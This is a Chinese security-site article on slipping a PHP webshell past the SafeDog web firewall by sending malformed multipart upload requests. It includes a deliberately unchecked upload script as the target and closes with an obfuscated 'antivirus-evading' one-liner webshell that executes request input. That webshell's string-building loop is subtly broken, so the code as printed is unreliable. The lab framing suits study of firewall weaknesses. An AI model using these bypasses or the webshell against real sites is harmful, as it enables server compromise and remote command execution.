freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
FreeBuf+小程序

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)
2017-01-16 10:23:12

*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:

<?php

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "<br/>";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

QQ截图20170112105926.jpg

很明显,文件名为"yijuhua.php"被拦截。。。。

4、尝试%00截断:

QQ截图20170112110130.jpg

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

QQ截图20170112110308.jpgQQ截图20170112110403.jpg

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

QQ截图20170112110526.jpg

QQ截图20170112110634.jpgQQ截图20170112110904.jpg

(3)修改Content-Disposition字段值的大小写:

QQ截图20170112111451.jpg

6、菜刀连接一句话:

QQ截图20170112123418.jpg

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:

<?php

/*

PHP一句话木马

assert($string)

*/

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i<count($arr);$i++) {

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

QQ截图20170112105346.jpg

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

*本文原创作者:1_2(QQ:965207103),本文属FreeBuf原创奖励计划,未经许可禁止转载

本文作者:, 属于FreeBuf原创奖励计划,未经许可禁止转载

# webshell上传 # 绕过网站安全狗
被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦